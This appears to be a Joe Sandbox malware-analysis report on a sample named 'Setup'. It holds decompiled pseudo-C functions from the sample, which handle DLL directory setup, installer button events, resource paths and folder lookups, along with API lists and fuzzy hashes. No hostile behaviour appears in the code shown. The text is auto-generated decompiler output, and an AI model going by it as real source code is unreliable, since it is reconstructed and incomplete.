                                                                                                                                                              				int _v16;
                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                              
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v12 = LoadLibraryW(L"Kernel32.dll");
                                                                                                                                                              				if(_v12 == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					if(_v8 == 0) {
                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                              							if(( *0x5c1cc0 & 0x0000ffff) != 0) {
                                                                                                                                                              								_v16 = SetCurrentDirectoryW(0x5c1cc0);
                                                                                                                                                              								 *0x5c1cc0 = 0;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							GetCurrentDirectoryW(0x104, 0x5c1cc0);
                                                                                                                                                              							_v16 = SetCurrentDirectoryW(_a4);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					return _v16;
                                                                                                                                                              				}
                                                                                                                                                              				_v20 = GetProcAddress(_v12, "SetDllDirectoryW");
                                                                                                                                                              				if(_v20 != 0) {
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					_v16 = _v20(_a4);
                                                                                                                                                              				}
                                                                                                                                                              				FreeLibrary(_v12);
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 004250F9
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00425111
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00425135
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,005C1CC0), ref: 00425151
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0042515B
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(005C1CC0), ref: 00425176
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectory$Library$AddressFreeLoadProc
                                                                                                                                                              • String ID: Kernel32.dll$SetDllDirectoryW
                                                                                                                                                              • API String ID: 3848618540-1456639573
                                                                                                                                                              • Opcode ID: 2989dd36ad0d2758a2f63e4a7fb8f6b3e931af6ca2f0ad55cefa333f08e1b958
                                                                                                                                                              • Instruction ID: b34450486e86290ed816555a2d0d734a9eab7f8567511d1e9733fc25535bb76a
                                                                                                                                                              • Opcode Fuzzy Hash: 2989dd36ad0d2758a2f63e4a7fb8f6b3e931af6ca2f0ad55cefa333f08e1b958
                                                                                                                                                              • Instruction Fuzzy Hash: E611F878E40618FFEB10DFA4D858BEEBBB0BF18341F408559E811A3291D7B84A98DB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E004F3ED0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed int _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed int _v21;
                                                                                                                                                              				short _v32;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				short _v48;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				long _v60;
                                                                                                                                                              				long _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				signed int _t61;
                                                                                                                                                              				long _t78;
                                                                                                                                                              				struct HWND__* _t79;
                                                                                                                                                              				signed int _t84;
                                                                                                                                                              				signed int _t95;
                                                                                                                                                              				void* _t97;
                                                                                                                                                              				intOrPtr _t120;
                                                                                                                                                              				void* _t136;
                                                                                                                                                              				void* _t137;
                                                                                                                                                              				signed int _t138;
                                                                                                                                                              
                                                                                                                                                              				_t137 = __esi;
                                                                                                                                                              				_t136 = __edi;
                                                                                                                                                              				_t97 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x512e3f);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t61 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t61 ^ _t138);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v68 = __ecx;
                                                                                                                                                              				_v20 = E00404310( *(_v68 + 0x48));
                                                                                                                                                              				if(_a8 == 0xfffffffe) {
                                                                                                                                                              					_v20 = _v20 * 0xffffffff;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					L9:
                                                                                                                                                              					__eflags = _a8;
                                                                                                                                                              					if(_a8 == 0) {
                                                                                                                                                              						L11:
                                                                                                                                                              						E00416910( &_v56, 0);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *( *(_v68 + 0x48)) + 0x80))))( *(_v68 + 0x48), L"dontAskAbort", 0, 0,  &_v56);
                                                                                                                                                              						__eflags = _v48;
                                                                                                                                                              						if(_v48 != 0) {
                                                                                                                                                              							L14:
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E00417430( &_v56);
                                                                                                                                                              							L15:
                                                                                                                                                              							_v21 = E00404A30(E004049B0());
                                                                                                                                                              							E004E6960(E004049B0(), 2);
                                                                                                                                                              							 *(_v68 + 0x48) = 0;
                                                                                                                                                              							E00415F10(_v68);
                                                                                                                                                              							__eflags = _a8 - 1;
                                                                                                                                                              							if(_a8 != 1) {
                                                                                                                                                              								__eflags = _v21 & 0x000000ff;
                                                                                                                                                              								if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                              									_t79 =  *0x5bdd34; // 0x80078
                                                                                                                                                              									PostMessageW(_t79, 0x10, _v20, 0);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_t78 = 0;
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							L19:
                                                                                                                                                              							 *[fs:0x0] = _v16;
                                                                                                                                                              							return _t78;
                                                                                                                                                              						}
                                                                                                                                                              						E004E6960(E004049B0(), 0);
                                                                                                                                                              						_t84 = E004E40D0(_t97, _t136, _t137, __eflags,  *((intOrPtr*)(_v68 + 4)), _v20);
                                                                                                                                                              						__eflags = _t84;
                                                                                                                                                              						if(_t84 != 0) {
                                                                                                                                                              							goto L14;
                                                                                                                                                              						}
                                                                                                                                                              						E004E6960(E004049B0(), 1);
                                                                                                                                                              						E00415F30( *(_v68 + 0x48) + 0x84);
                                                                                                                                                              						_v64 = 0;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E00417430( &_v56);
                                                                                                                                                              						_t78 = _v64;
                                                                                                                                                              						goto L19;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 - 0xffffffff;
                                                                                                                                                              					if(_a8 != 0xffffffff) {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					goto L11;
                                                                                                                                                              				}
                                                                                                                                                              				E00416910( &_v40, 0);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				 *((intOrPtr*)( *((intOrPtr*)( *( *(_v68 + 0x48)) + 0x80))))( *(_v68 + 0x48), L"onXBtnPress", 0, 0,  &_v40);
                                                                                                                                                              				if(_v32 == 0) {
                                                                                                                                                              					_t120 = _v68;
                                                                                                                                                              					__eflags =  *(_t120 + 0x4c);
                                                                                                                                                              					if( *(_t120 + 0x4c) != 0) {
                                                                                                                                                              						_t95 = E004161A0( *((intOrPtr*)(_v68 + 0x4c)) + 0x84);
                                                                                                                                                              						__eflags = _t95;
                                                                                                                                                              						if(_t95 != 0) {
                                                                                                                                                              							_v20 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00417430( &_v40);
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				_v60 = 0;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E00417430( &_v40);
                                                                                                                                                              				_t78 = _v60;
                                                                                                                                                              				goto L19;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F3FFD
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F4022
                                                                                                                                                                • Part of subcall function 004161A0: IsWindow.USER32(005C21C8), ref: 004161AD
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F4069
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F407A
                                                                                                                                                              • PostMessageW.USER32(00080078,00000010,00000010,00000000), ref: 004F40B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$MessagePostWindow
                                                                                                                                                              • String ID: dontAskAbort$onXBtnPress
                                                                                                                                                              • API String ID: 2663934143-2813093310
                                                                                                                                                              • Opcode ID: fdfff80750ec8eccded9bc7db14716937af7c38bb839c85cebd79bb15b6ca5a6
                                                                                                                                                              • Instruction ID: df72d657e7978b6182769af25d3421523c2893e7f1735e4823fd73f4850d1854
                                                                                                                                                              • Opcode Fuzzy Hash: fdfff80750ec8eccded9bc7db14716937af7c38bb839c85cebd79bb15b6ca5a6
                                                                                                                                                              • Instruction Fuzzy Hash: 91516C70A00208DFDB14EFA5C951BAEB7B1BF44318F10422DE611AB3D1DB799D41CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004F07A0(intOrPtr* __ecx) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				WCHAR* _v32;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				char _v57;
                                                                                                                                                              				char _v58;
                                                                                                                                                              				intOrPtr* _v64;
                                                                                                                                                              				signed int _t34;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t82;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x507c92);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t34 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t34 ^ _t82);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v64 = __ecx;
                                                                                                                                                              				E00414C90();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if((E004F06E0(_v64, L"brwseCntnr", E00434050( &_v20)) & 0x000000ff) != 0) {
                                                                                                                                                              					if((E00404920(E00404820()) & 0x000000ff) != 0 || ( *0x5bdd29 & 0x000000ff) != 0) {
                                                                                                                                                              						E004169E0( &_v56, L"brwseCntnr");
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x80))))(_v64, L"hideElmnt",  &_v56, 1, 0);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E00417430( &_v56);
                                                                                                                                                              					} else {
                                                                                                                                                              						E004169E0( &_v40, E00404930(E00404820()));
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						PathRemoveBackslashW(_v32);
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x80))))(_v64, L"setBrowse",  &_v40, 1, 0);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E00417430( &_v40);
                                                                                                                                                              					}
                                                                                                                                                              					_v58 = 1;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t49 = _v58;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v57 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t49 = _v57;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t49;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F080F
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F082D
                                                                                                                                                              • PathRemoveBackslashW.SHLWAPI(?,00000000,brwseCntnr,00000000,DDD124F9,?,?,?,?,?,?,?,00000000,00507C92,000000FF), ref: 004F084A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$BackslashPathRemove
                                                                                                                                                              • String ID: brwseCntnr$brwseCntnr$hideElmnt$setBrowse
                                                                                                                                                              • API String ID: 2946794254-14752801
                                                                                                                                                              • Opcode ID: aa4e9a2065ffbc5d84d15672093c52eb6e90488d1ec1617788d1aa26f9c84a39
                                                                                                                                                              • Instruction ID: 996e323863dc21f8ddc5e25e8d50fa9a8077a5c7caa1c71174538892715ef173
                                                                                                                                                              • Opcode Fuzzy Hash: aa4e9a2065ffbc5d84d15672093c52eb6e90488d1ec1617788d1aa26f9c84a39
                                                                                                                                                              • Instruction Fuzzy Hash: D031C570E04148ABDB08EBA5E952BFEBBB4BF54304F10416DF551A72D2DB786D04CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004C94C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v530;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				intOrPtr _v536;
                                                                                                                                                              				intOrPtr _v540;
                                                                                                                                                              				char _v544;
                                                                                                                                                              				char _v576;
                                                                                                                                                              				char _v577;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				signed int _t31;
                                                                                                                                                              				char _t33;
                                                                                                                                                              				short _t34;
                                                                                                                                                              				void* _t45;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				intOrPtr _t51;
                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                              				void* _t79;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              
                                                                                                                                                              				_t79 = __esi;
                                                                                                                                                              				_t78 = __edi;
                                                                                                                                                              				_t50 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x509731);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t31 = _t30 ^ _t80;
                                                                                                                                                              				_v20 = _t31;
                                                                                                                                                              				_push(_t31);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_t33 = L"res://"; // 0x650072
                                                                                                                                                              				_v544 = _t33;
                                                                                                                                                              				_t51 = M00532BB0; // 0x3a0073
                                                                                                                                                              				_v540 = _t51;
                                                                                                                                                              				_t75 =  *0x532bb4; // 0x2f002f
                                                                                                                                                              				_v536 = _t75;
                                                                                                                                                              				_t34 =  *0x532bb8; // 0x0
                                                                                                                                                              				_v532 = _t34;
                                                                                                                                                              				E00451D90(__edi,  &_v530, 0, 0x1fa);
                                                                                                                                                              				GetModuleFileNameW(E0042DE70(0x5c1a9c),  &_v532, 0xfe);
                                                                                                                                                              				E00417910( &_v544, E00434050( &_v577));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004181D0(_a8,  &_v576);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					if(_a12 != 1) {
                                                                                                                                                              						if(_a12 != 3) {
                                                                                                                                                              							E004130D0(_a8 + 4, L"/#2/BMP_");
                                                                                                                                                              						} else {
                                                                                                                                                              							E004130D0(_a8 + 4, L"/PNG/PNG_");
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						E004130D0(_a8 + 4, L"/GIFS/IMG_");
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					E004130D0(_a8 + 4, L"/GIFS/");
                                                                                                                                                              				}
                                                                                                                                                              				E004130D0(_a8 + 4, _a4);
                                                                                                                                                              				_t45 = E00416A30(_a8 + 4);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t45, _t50, _v20 ^ _t80, _a4, _t78, _t79);
                                                                                                                                                              			}























                                                                                                                                                              0x004c9601
                                                                                                                                                              0x004c9609
                                                                                                                                                              0x004c961e

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004C9529
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000000FE,?,?,DDD124F9), ref: 004C9548
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleName_memset
                                                                                                                                                              • String ID: /#2/BMP_$/GIFS/$/GIFS/IMG_$/PNG/PNG_$res://
                                                                                                                                                              • API String ID: 158409099-203929119
                                                                                                                                                              • Opcode ID: 25d9f2395774c197b481740858660954c230d2b3eb48ebba1b64c80e62185a25
                                                                                                                                                              • Instruction ID: 0b1c1c9f6f186164942746de259c9d6f7ab329896894dcb7d269e9c6bab858ef
                                                                                                                                                              • Opcode Fuzzy Hash: 25d9f2395774c197b481740858660954c230d2b3eb48ebba1b64c80e62185a25
                                                                                                                                                              • Instruction Fuzzy Hash: FA31AE35600209ABDB14EF54DC65BEEB7B4FF14318F00819EE81A67281DB78AB84CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E004F77C0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				struct HINSTANCE__* _v24;
                                                                                                                                                              				_Unknown_base(*)()* _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v34;
                                                                                                                                                              				char _v35;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v37;
                                                                                                                                                              				char _v38;
                                                                                                                                                              				char _v39;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				short _v42;
                                                                                                                                                              				short _v44;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v84;
                                                                                                                                                              				char _v85;
                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              
                                                                                                                                                              				_t71 = __esi;
                                                                                                                                                              				_t70 = __edi;
                                                                                                                                                              				_t55 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5099bc);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t39 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t40 = _t39 ^ _t72;
                                                                                                                                                              				_v32 = _t40;
                                                                                                                                                              				_push(_t40);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v92 = __ecx;
                                                                                                                                                              				_v20 = 0x80004005;
                                                                                                                                                              				if((E00494F20(__eflags) & 0x000000ff) != 0) {
                                                                                                                                                              					_v24 = GetModuleHandleW(L"shell32.dll");
                                                                                                                                                              					if(_v24 != 0) {
                                                                                                                                                              						_v48 = 0xa520a1a4;
                                                                                                                                                              						_v44 = 0x1780;
                                                                                                                                                              						_v42 = 0x4ff6;
                                                                                                                                                              						_v40 = 0xbd;
                                                                                                                                                              						_v39 = 0x18;
                                                                                                                                                              						_v38 = 0x16;
                                                                                                                                                              						_v37 = 0x73;
                                                                                                                                                              						_v36 = 0x43;
                                                                                                                                                              						_v35 = 0xc5;
                                                                                                                                                              						_v34 = 0xaf;
                                                                                                                                                              						_v33 = 0x16;
                                                                                                                                                              						_v28 = GetProcAddress(_v24, "SHGetKnownFolderPath");
                                                                                                                                                              						_v52 = 0;
                                                                                                                                                              						_t68 =  &_v48;
                                                                                                                                                              						_v20 = _v28( &_v48, 0, 0,  &_v52);
                                                                                                                                                              						if(_v20 >= 0) {
                                                                                                                                                              							E00417910(_v52, E00434050( &_v85));
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							E004181D0(_a4,  &_v84);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              							_t68 = _v52;
                                                                                                                                                              							__imp__CoTaskMemFree(_v52);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v20, _t55, _v32 ^ _t72, _t68, _t70, _t71);
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(shell32.dll,DDD124F9,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004F7807
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004F785C
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,00000000,00000000), ref: 004F78BF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleModuleProcTask
                                                                                                                                                              • String ID: C$SHGetKnownFolderPath$s$shell32.dll
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040F720(intOrPtr _a4, signed int _a12, struct HDC__** _a16) {
                                                                                                                                                              				struct tagRECT _v20;
                                                                                                                                                              				struct HDC__* _v24;
                                                                                                                                                              				struct HBITMAP__* _v28;
                                                                                                                                                              				void* _v32;
                                                                                                                                                              
                                                                                                                                                              				if(_a16 == 0) {
                                                                                                                                                              					return 0x80004003;
                                                                                                                                                              				}
                                                                                                                                                              				if(( *(_a4 + 0x30) & 0x000000ff) != 0) {
                                                                                                                                                              					 *_a16 = E0040F700(_a4 - 0x28);
                                                                                                                                                              					if( *_a16 != 0) {
                                                                                                                                                              						 *(_a4 + 0x30) = 0;
                                                                                                                                                              						if((_a12 & 0x00000001) == 0) {
                                                                                                                                                              							E00416BC0(_a4 - 0x28,  &_v20);
                                                                                                                                                              							if((_a12 & 0x00000004) != 0) {
                                                                                                                                                              								_v24 = CreateCompatibleDC( *_a16);
                                                                                                                                                              								if(_v24 != 0) {
                                                                                                                                                              									_v28 = CreateCompatibleBitmap( *_a16, _v20.right - _v20.left, _v20.bottom - _v20.top);
                                                                                                                                                              									if(_v28 != 0) {
                                                                                                                                                              										_v32 = SelectObject(_v24, _v28);
                                                                                                                                                              										if(_v32 != 0) {
                                                                                                                                                              											DeleteObject(_v32);
                                                                                                                                                              											 *(_a4 + 0x2c) =  *_a16;
                                                                                                                                                              											 *_a16 = _v24;
                                                                                                                                                              										} else {
                                                                                                                                                              											DeleteObject(_v28);
                                                                                                                                                              											DeleteDC(_v24);
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										DeleteDC(_v24);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							if((_a12 & 0x00000002) != 0) {
                                                                                                                                                              								FillRect( *_a16,  &_v20, 6);
                                                                                                                                                              							}
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					return 0x80004005;
                                                                                                                                                              				} else {
                                                                                                                                                              					return 0x80004005;
                                                                                                                                                              				}
                                                                                                                                                              			}








                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

